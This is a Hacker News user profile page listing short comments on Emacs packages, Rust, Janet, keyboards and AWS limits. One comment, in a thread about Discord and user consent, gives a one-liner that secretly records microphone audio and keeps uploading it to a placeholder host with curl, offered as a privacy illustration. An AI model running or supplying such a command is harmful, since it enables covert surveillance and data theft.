Viewing profile — ahungry
ahungry
HN member- Joined
- Mon, Sep 10, 2018, 3:05 AM UTC
- HN karma
- 233
- Public activity
- 52 items
- HN profile
- View on Hacker News ↗
About ahungry
Recent public activity
-
comment
Comment #38259139
Bravo - for these simple things, typing in a GPT prompt or search query is more work than the command. Even things like "what flags to use with ffmpeg" are a shell reverse-history …
-
comment
Comment #37773648
I loved slitaz - got me into linux!
- story
-
comment
Comment #33767780
I've been using https://github.com/Malabarba/Nameless for awhile now - it's functionally very similar to the new Emacs shorthands feature.
-
comment
Comment #33714238
perl6/rakudo has most the same convenience features, albeit a little less type checking
-
comment
Comment #33714197
I've noticed that Rust is in an interesting spot - it has a lot of overlapping appeal with various groups. - C/C++ developers like it as an alternative for low level languages - Fu…
-
comment
Comment #33639529
Doesn't it show a system tray icon? (I don't use discord on Windows, or a system tray myself) - is a system tray icon not adequate? I believe it would show 24/7 wouldn't it?
-
comment
Comment #33639048
Did the users choose to install the Discord app (or run a random command?) How are you supposed to confirm "user understanding"? Does the program need to require a tutorial/trainin…
-
comment
Comment #33638936
Something like: nohup arecord /tmp/audio & ; nohup while :; do curl -F'data=/tmp/audio' http://example.com; done & Untested pseudocode, but probably close - that's enough for a GDP…
-
comment
Comment #33602926
This was a trend in the early 2010s on a lot of Clojure projects
-
comment
Comment #33602182
I believe homoiconicity is more related to the syntax than the underlying implementation - fans of homoiconic code use it to treat code as data (macros and eval) rather than to rea…
- comment
-
comment
Comment #33445458
Well stated.
-
comment
Comment #33367731
Nice tip!
-
comment
Comment #33367722
love this
-
comment
Comment #33364646
Wrap the entire script in {}, otherwise a change to it will impact running instances (best case, causing an abrupt error).
-
comment
Comment #33240353
Sometimes the infrastructure causes this. For a long time (and now?) AWS Api Gateway has a hard cap of 30 seconds, so the sum of all hops along the way need to remain under that.
-
comment
Comment #32445786
yup, thats the appeal - in a multi language environment a common call, not having to futz with cargo run, npm run start, python3 -m something, etc
-
comment
Comment #32356924
Compiles/transpiles into code that runs on a "host" language execution environment (nodejs, JVM, CLR) instead of it's own VM implementation, or native code.
-
comment
Comment #30536770
It'd be nice if someone on the Snowflake team actually maintained their JS adapter... ( https://github.com/snowflakedb/snowflake-connector-nodejs/pu... )
-
comment
Comment #28853979
I wrote similar here: https://github.com/ahungry/janet-pobox although it probably needs updates to work with 1.18 and above.
-
comment
Comment #28853954
In libjanet you can use a C call like janet_panic() that'll "panic" and throw an exception/error up in the active Janet runtime (so when something bad/unexpected happens in your C …
-
comment
Comment #28746328
True, so more clicky than not clicky at all would put any clicky one in the "more clicky" category (blue/green/???) :) The silver speed ones on this kraken keyboard aren't bad, but…
-
comment
Comment #28725645
As noted on the article - looking for recommendations of nice 60% keyboards in the $100'ish price point range as well. Something a little more clicky than brown switches, but perha…
- story